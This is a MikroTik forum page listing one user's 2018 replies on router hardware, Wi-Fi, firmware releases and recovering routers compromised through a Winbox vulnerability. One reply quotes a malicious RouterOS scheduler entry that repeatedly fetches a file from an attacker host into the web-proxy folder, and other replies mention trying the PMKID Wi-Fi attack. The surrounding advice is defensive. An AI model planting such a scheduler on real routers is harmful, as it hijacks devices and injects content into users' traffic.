by R1CH
Fri Oct 05, 2018 12:50 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 25
Views: 6434

Re: New standard 802.11ax

Any news? ASUS are releasing their RT-AX88U this month which is based on 802.11ax. Would love for Mikrotik to keep up with the home / office wifi space.
by R1CH
Thu Oct 04, 2018 12:19 am
Forum: General
Topic: Route cast to another VLAN
Replies: 3
Views: 303

Re: Route cast to another VLAN

Easiest solution is to put the TV on the guest VLAN; usually such devices are insecure and should be away from your main network anyway. Otherwise you will need to allow routing between the VLANs and forward the multicasts with something like https://github.com/sonicsnes/udp-broadcast-relay-redux
by R1CH
Wed Oct 03, 2018 3:43 pm
Forum: General
Topic: Router compromised even after updating firmware
Replies: 2
Views: 231

Re: Router compromised even after updating firmware

If you backed up from before the compromise, then the backup is safe to use. You can also export the compromised config and manually review it before importing it on a fresh router with changed passwords.
by R1CH
Mon Oct 01, 2018 3:41 pm
Forum: Wireless Networking
Topic: hap ac achievable wifi speed?
Replies: 28
Views: 2177

Re: hap ac achievable wifi speed?

Real world result from a phone in a room across from the hAP AC (wall mounted high up). Almost clear LOS (has to go through a doorway). -57 dBm on the hAP AC, -54 dBm on the phone. Upload limited by ISP.
by R1CH
Mon Oct 01, 2018 3:33 pm
Forum: General
Topic: dns requests to Mikrotik fail if udp on linux
Replies: 5
Views: 368

Re: dns requests to Mikrotik fail if udp on linux

I have an open ticket (#2016082522001037) about bad DNS behavior with the RB850Gx2, apparently with multi core some UDP packets are simply dropped. Perhaps it applies to the RB3011 also. This is a problem since the Linux resolver likes to send two queries at once, one for IPv4 and one for IPv6. Try ...
by R1CH
Mon Oct 01, 2018 3:30 pm
Forum: General
Topic: Winbox Protocol Dissector
Replies: 2
Views: 433

Re: Winbox Protocol Dissector

Very nice, this will make finding vulnerabilities in the protocol much easier!
by R1CH
Fri Sep 28, 2018 3:08 pm
Forum: General
Topic: something is wrong with my DNS resolving...
Replies: 8
Views: 670

Re: something is wrong with my DNS resolving...

Also be sure to change all passwords, if you ran a vulnerable version then the attacker got full access to all passwords on user accounts.
by R1CH
Thu Sep 27, 2018 10:52 pm
Forum: General
Topic: Suspect script foun
Replies: 3
Views: 866

Re: Suspect script foun

Do a netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Thu Sep 27, 2018 2:23 pm
Forum: General
Topic: Ports Filtered regardless of firewall rules
Replies: 1
Views: 656

Re: Ports Filtered regardless of firewall rules

If you're testing from outside your own LAN, this is almost certainly done by your ISP as those are commonly abused ports.
by R1CH
Thu Sep 27, 2018 2:21 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

Has anyone been able to order one of these yet? Seems like the expected stock arrival dates keep getting pushed back.
by R1CH
Thu Sep 27, 2018 2:19 pm
Forum: General
Topic: Mikrotik How to SSH from Linux to Mikrotik without Password
Replies: 2
Views: 482

Re: Mikrotik How to SSH from Linux to Mikrotik without Password

Agreed, you should not be using DSA in 2018. Even RSA isn't great, but Ed25519 keys are not yet supported by Mikrotik.
by R1CH
Wed Sep 26, 2018 3:35 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

I've had no issues with fs.com 10G DACs between Mikrotik, Netgear and Linksys gear. The stuff is all from China but they seem to have their logistics nailed down pretty well which is how they can offer such good pricing. I know a lot of other people in the industry also use FS so it's not like they'...
by R1CH
Thu Sep 20, 2018 6:16 pm
Forum: General
Topic: Swift mailer issue: not compatible with php router os api
Replies: 1
Views: 212

Re: Swift mailer issue: not compatible with php router os api

This doesn't seem to have anything to do with RouterOS API, your Swift installation seems broken:
Class Swift_SmtpTransport could not be loaded from Swift\SmtpTransport.php, file does not exist
by R1CH
Thu Sep 20, 2018 4:41 pm
Forum: Announcements
Topic: v6.43.1 [stable] and v6.43.2 [stable] are released!
Replies: 186
Views: 38217

Re: v6.43.1 [stable] and v6.43.2 [stable] is released!

Breaking the bootloader in a "stable" release... :lol:
by R1CH
Wed Sep 19, 2018 7:54 pm
Forum: RouterBOARD hardware
Topic: RB1100 dead
Replies: 12
Views: 1295

Re: RB1100 dead

Based on this topic it seems the bootloader is damaged. You may find more advice here:

viewtopic.php?t=133750
by R1CH
Wed Sep 19, 2018 5:14 pm
Forum: General
Topic: Weird outbound UDP traffic
Replies: 19
Views: 2052

Re: Weird outbound UDP traffic

Emailing support@mikrotik.com will generate a "ticket". I agree this is poor behavior.
by R1CH
Wed Sep 19, 2018 5:13 pm
Forum: General
Topic: Help ! My Router is suddenly messing up my configuration !
Replies: 1
Views: 203

Re: Help ! My Router is suddenly messing up my configuration !

Since those aren't dynamic entries, they have been added through the admin interface. Most likely your router is compromised from leaving open ports on the WAN interface. You should netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Tue Sep 18, 2018 5:49 pm
Forum: General
Topic: Mikrotik Error when generating external PDF file
Replies: 7
Views: 573

Re: Mikrotik Error when generating external PDF file

"/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47 add interval=13h name=upd114 on-event=\ "/tool fetch url=http://gotan.bit:31415/01/error.html ...
by R1CH
Tue Sep 18, 2018 4:02 pm
Forum: General
Topic: Port 60000 attacks, anyone info on this?
Replies: 11
Views: 1067

Re: Port 60000 attacks, anyone info on this?

3389 is RDP, just a standard probe for vulnerable servers. Your firewall should be dropping this without requiring a dedicated rule.
by R1CH
Mon Sep 17, 2018 9:14 pm
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 1005

Re: Stopping connections to TCP port 1720

What kind of connection do you have? Certain modems apparently open upnp to WAN, so you're actually connecting to the modem, not the router.
by R1CH
Thu Sep 13, 2018 9:01 pm
Forum: General
Topic: Can default configuration be hacked?
Replies: 8
Views: 1012

Re: Can default configuration be hacked?

If you didn't change passwords then the attackers just reconnected with the stolen password and re-infected the router.
by R1CH
Thu Sep 13, 2018 4:46 pm
Forum: General
Topic: mikrotik configuration issue none caching pages with double quote
Replies: 2
Views: 212

Re: mikrotik configuration issue none caching pages with double quote

You may have a compromised system that has HTTP proxy enabled with malware that is injecting crypto mining scripts into pages. Safest way forward is to netinstall and change all passwords. A config export will easily identify the issue.
by R1CH
Thu Sep 13, 2018 1:29 am
Forum: Wireless Networking
Topic: MT wifi setup options for small retail shops & cafes
Replies: 1
Views: 387

Re: MT wifi setup options for small retail shops & cafes

A single wAP AC should be enough for that kind of light usage. Concurrent users depend a lot on what kind of devices are connecting (slow 2.4 GHz only?), space to be covered and how crowded the frequencies are already. If you do want to go with the annoying social media hotspot then you probably wan...
by R1CH
Thu Sep 13, 2018 1:22 am
Forum: General
Topic: Hate new firmware versioning
Replies: 2
Views: 397

Re: Hate new firmware versioning

I think most admins are in agreement, I haven't seen anyone who is a fan of the new firmware versioning!
by R1CH
Thu Sep 13, 2018 1:20 am
Forum: General
Topic: Attack on port 45678
Replies: 4
Views: 477

Re: Attack on port 45678

Probably if it ran an old version and didn't patch in time, it fell to this: https://blog.mikrotik.com/security/winb ... ility.html

Safest way forward is to netinstall. Don't forget to change all passwords.
by R1CH
Thu Sep 13, 2018 1:18 am
Forum: General
Topic: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop
Replies: 4
Views: 488

Re: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop

Are you tracing to a route which has "prohibit" status?
by R1CH
Thu Sep 13, 2018 1:15 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 8
Views: 1207

Re: Add emoji to the ssid name

With the suggestions here I've made the script a bit more user friendly.
by R1CH
Tue Sep 11, 2018 1:19 am
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21178

Re: [Feature request] Wireguard

And we already know what happens when MikroTik quickly implement a protocol which then later continues to develop independently... see OpenVPN. I know it's a lot to hope for, but this could easily be avoided if Mikrotik would stop re-implementing these features themselves and start using the open s...
by R1CH
Tue Sep 11, 2018 12:52 am
Forum: Announcements
Topic: Newsletter #84
Replies: 47
Views: 12637

Re: Newsletter #84

The RouterOS implementation of OpenVPN will always have shitty throughput since it lacks UDP support.

http://sites.inka.de/bigred/devel/tcp-tcp.html

RB4011 looks like a beast of a device though!
by R1CH
Tue Sep 11, 2018 12:49 am
Forum: RouterBOARD hardware
Topic: Cloud Core Router CCR 1009 cpu Temp
Replies: 2
Views: 388

Re: Cloud Core Router CCR 1009 cpu Temp

I would guess the heatsink has come loose / blocked with debris or thermal interface has degraded.
by R1CH
Mon Sep 10, 2018 7:46 pm
Forum: Announcements
Topic: v6.43 [current] is released!
Replies: 148
Views: 28174

Re: v6.43 [current] is released!

-nm was a winbox issue-
by R1CH
Thu Sep 06, 2018 7:51 pm
Forum: General
Topic: Securing my Rb3011 under attack - SOLVED
Replies: 3
Views: 403

Re: Securing my Rb3011 under attack

You have no firewall so ALL services are exposed! Be aware that exposing any service to the internet is a risk, not even winbox is safe as it was recently exploited.

Step 1: Turn off all unnecessary services in ip / services.
Step 2: Create firewall rule at top of INPUT chain with ACCEPT for your IP...
by R1CH
Mon Sep 03, 2018 7:27 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as c...
by R1CH
Mon Sep 03, 2018 3:40 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as cu...
by R1CH
Thu Aug 30, 2018 6:18 pm
Forum: General
Topic: youtube cache on mikrotik router
Replies: 2
Views: 448

Re: youtube cache on mikrotik router

On Mikrotik it is not possible, but as an ISP you can apply for a GGC.

https://peering.google.com/#/options/go ... obal-cache
by R1CH
Wed Aug 29, 2018 3:40 pm
Forum: General
Topic: Hotspot captive portal prevent automatic close on redirect after login
Replies: 22
Views: 12564

Re: Hotspot captive portal prevent automatic close on redirect after login

Be aware that by bypassing the connectivity check in this way there will be NO hotspot popup. Your users will have a very hard time triggering the captive portal redirect, as most sites are using HTTPS which means they will show scary security error messages instead of a redirect. Think carefully ab...
by R1CH
Mon Aug 27, 2018 2:45 pm
Forum: General
Topic: Mikrotik CCR-1009-7G-1C Port Loop Problem
Replies: 2
Views: 293

Re: Mikrotik CCR-1009-7G-1C Port Loop Problem

Post your config, screenshot does not really help. Most likely you have a broken bridge port config or an actual loop.
by R1CH
Sat Aug 25, 2018 12:42 am
Forum: General
Topic: Block user with bad intention
Replies: 6
Views: 766

Re: Block user with bad intention

So what happens when I spoof the IP of Google DNS or whatever DNS server you're using? Oops, your network no longer has DNS connectivity. You should NEVER add to blocklists based on a single input packet. IP spoofing is quite easy, if someone knows this is how your network is setup, they can easily ...
by R1CH
Fri Aug 24, 2018 6:17 pm
Forum: General
Topic: [SOLVED] IPv6 pings work, webpage won't load
Replies: 39
Views: 2216

Re: [SOLVED] IPv6 pings work, webpage won't load

If clamp-to-pmtu solves the problem this probably means there is something in the network path that is dropping ICMPv6 messages. This is pretty bad and you should try and figure out where this is happening and fix it if possible.
by R1CH
Thu Aug 23, 2018 8:05 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

Bricked a wAP AC by installing this from 6.36 / 6.37 (wasn't paying close attention to the old version). Rebooted and ethernet is constantly cycling link / no-link, no netinstall, no backup loader. RMA time it seems.

Be careful if upgrading from older versions!
by R1CH
Thu Aug 23, 2018 3:52 am
Forum: RouterBOARD hardware
Topic: Cheapest device to support 5GHz spectral scan
Replies: 2
Views: 591

Re: Cheapest device to support 5GHz spectral scan

No Mikrotik device supports 5 GHz spectral scan.
by R1CH
Thu Aug 23, 2018 1:46 am
Forum: General
Topic: router rebooted because some critical program crashed
Replies: 5
Views: 1638

Re: router rebooted because some critical program crashed

Strong enough power supply?
by R1CH
Wed Aug 22, 2018 11:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38198

Re: Security announcement blog

It's been a full business day and the blog is still not updated with the news about what these four security bugs from the latest RouterOS release actually are. This seems to be a step backwards, before the blog the changelog said things like "www) fixed vulnerability" so admins at least knew the ww...
by R1CH
Wed Aug 22, 2018 11:50 pm
Forum: General
Topic: MikroTiks Blocking Functionality on certain websites [SOLVED]
Replies: 3
Views: 365

Re: MikroTiks Blocking Functionality on certain websites [SOLVED]

Your client or network is considered bad by F5 Networks Application Security Manager (ASM), which is what is generating this message. Most likely because the poor firewall config let your Mikrotiks be infected and become part of a botnet, so now your IP is blacklisted by certain vendors. Change IP / ISP.
by R1CH
Wed Aug 22, 2018 6:49 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

I can confirm that the security fixes were added to the notes after the 6.42.7 thread was already posted! Why was this?
by R1CH
Wed Aug 22, 2018 6:39 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

Were these security fixes stealthily added to the v6.42.7 patch notes? I don't recall seeing them there before and I didn't update since it didn't look like a necessary update. It's very bad that details aren't available even though the fixed version is published. It doesn't take much effort to comp...
by R1CH
Wed Aug 22, 2018 6:34 pm
Forum: Announcements
Topic: v6.40.9 [bugfix] is released!
Replies: 56
Views: 14776

Re: v6.40.9 [bugfix] is released!

What is the point of publishing CVE numbers if the vulnerabilities are still private? Hackers can reverse engineer the changes in this version and figure out what the vulnerabilities are and start exploiting them, so there's no point keeping it private once you publish the fix - it only benefits hac...
by R1CH
Wed Aug 22, 2018 12:19 am
Forum: General
Topic: PSA: bandwidth-test Brute Force attempts
Replies: 2
Views: 481

Re: PSA: bandwidth-test Brute Force attempts

On a related note, it would be nice to see bandwidth-test server moved to IP / services so all the useless services can be disabled in one place.
by R1CH
Tue Aug 21, 2018 1:21 am
Forum: Wireless Networking
Topic: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T
Replies: 1
Views: 804

Re: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T

The RB2011 is a very old router (hence the name) which doesn't support 5 GHz, so no 802.11ac. Speeds you show are about what is expected for a 2.4 GHz network.

I recommend hAP AC / cAP AC / wAP AC instead depending on your installation needs.
by R1CH
Mon Aug 20, 2018 1:57 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

Upgraded 5 x wAP AC, no issues so far.
by R1CH
Sun Aug 19, 2018 9:38 pm
Forum: General
Topic: broswer shows establishing secure connection when eoip active
Replies: 2
Views: 294

Re: broswer shows establishing secure connection when eoip active

You probably need to enable PMTU clamping.
by R1CH
Sat Aug 18, 2018 12:13 am
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 861

Re: Open the regular browser after Captive Portal Popup login window

Sure, but those URLs will still only open in the captive portal window.
by R1CH
Fri Aug 17, 2018 5:17 pm
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 861

Re: Open the regular browser after Captive Portal Popup login window

No, you cannot control how the client's OS behaves. Captive portal windows are usually limited in what they can do for the specific purpose of signing in.
by R1CH
Wed Aug 15, 2018 3:40 pm
Forum: General
Topic: Kernel failure using traffic generator
Replies: 1
Views: 237

Re: Kernel failure using traffic generator

The traffic generator is a kernel module coded by Mikrotik. It likely has some bugs, and bugs in the kernel mean a complete crash. I would advise against using it outside of test environments.
by R1CH
Sun Aug 12, 2018 6:17 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

True, but using such services goes against the goals of speed anyway. OVPN in TCP mode is especially terrible.
by R1CH
Sat Aug 11, 2018 6:41 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

Router doesn't care about the congestion algorithm, it simply forwards packets. It needs to be configured on the endpoints of the connection.
by R1CH
Sat Aug 11, 2018 2:09 am
Forum: General
Topic: TCP connections from china
Replies: 9
Views: 4808

Re: TCP connections from china

If someone is able to connect to that port, your router is insecure. Make sure to firewall all ports from WAN.
by R1CH
Thu Aug 09, 2018 1:46 pm
Forum: Wireless Networking
Topic: Open url / link from Hotspot login page in a browser
Replies: 1
Views: 308

Re: Open url / link from Hotspot login page in a browser

This is entirely dependent on the client device and not something you can configure.
by R1CH
Thu Aug 09, 2018 1:39 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3680

Re: Security breached devices - Port TCP 4145

I think you misunderstand, this isn't about services listening on high ports. Say for example a client on the network wants to connect to Google DNS, 8.8.8.8 port 53. Their OS has to pick a port on the system to send the query, and to which replies are sent, for example maybe it picks 192.168.88.10 por...
by R1CH
Thu Aug 09, 2018 12:49 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3680

Re: Security breached devices - Port TCP 4145

Traffic above the reserved ports (0-1024) can be attributed to ephemeral port use. While most OSes generally use the higher end of available ports, there's nothing stopping them from using 1025-65535 as ephemeral port numbers.
by R1CH
Thu Aug 09, 2018 12:46 pm
Forum: Announcements
Topic: WPA2 preshared key brute force attack
Replies: 26
Views: 24756

Re: WPA2 preshared key brute force attack

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
by R1CH
Wed Aug 08, 2018 6:10 pm
Forum: RouterBOARD hardware
Topic: upgrade from RB951G-2HnD
Replies: 3
Views: 495

Re: upgrade from RB951G-2HnD

The IPQ4018 used in new products is much faster than the CPU in RB951G-2HnD.
by R1CH
Wed Aug 08, 2018 1:18 am
Forum: General
Topic: Winbox Vulnerability Changes
Replies: 1
Views: 330

Re: Winbox Vulnerability Changes

The vulnerability allows someone full admin access to the router, so they could change anything and everything. Mikrotik seem to suggest that winbox can even be elevated to shell access, in which case undetectable backdoors could be installed. The safest way to restore a router is export the config,...
by R1CH
Tue Aug 07, 2018 7:11 pm
Forum: Wireless Networking
Topic: PMKID Attack - clientless WPA2/WPA PSK attack
Replies: 6
Views: 3123

Re: PMKID Attack - clientless WPA2/WPA PSK attack

I've attempted this attack against a wAP AC and it was unsuccessful. I don't think Mikrotik's wireless driver implements the features that this attack exploits.
by R1CH
Tue Aug 07, 2018 2:24 pm
Forum: General
Topic: Block devices with cloned MAC addresses
Replies: 2
Views: 337

Re: Block devices with cloned MAC addresses

The only decent way is to use EAP / 802.1x for authentication so there are per-client encryption keys.
by R1CH
Tue Aug 07, 2018 2:12 pm
Forum: General
Topic: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!
Replies: 2
Views: 759

Re: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!

If the bots are even able to try to log in, this means you are exposing winbox / SSH to the internet, and your router will be compromised when the next exploit is found. Any router that has open ports to the internet is not secure according to Mikrotik.
by R1CH
Tue Aug 07, 2018 2:11 pm
Forum: General
Topic: 100% CPU CCR1072 due DDoS - How to improve?
Replies: 16
Views: 1179

Re: 100% CPU CCR1072 due DDoS - How to improve?

close port 80 from outside use. This is not a solution to CPU consumption. Also, if it's a web server you can't do this, it's a useless solution because the attacker can choose any port. It is a solution if you have a listening service on port 80. This is a SYN flood, if you actually have an applic...
by R1CH
Mon Aug 06, 2018 5:48 pm
Forum: General
Topic: HTTPS & Force to login from devices
Replies: 2
Views: 317

Re: HTTPS & Force to login from devices

Allowing *google* and gstatic.com will likely break captive portal detection on client devices.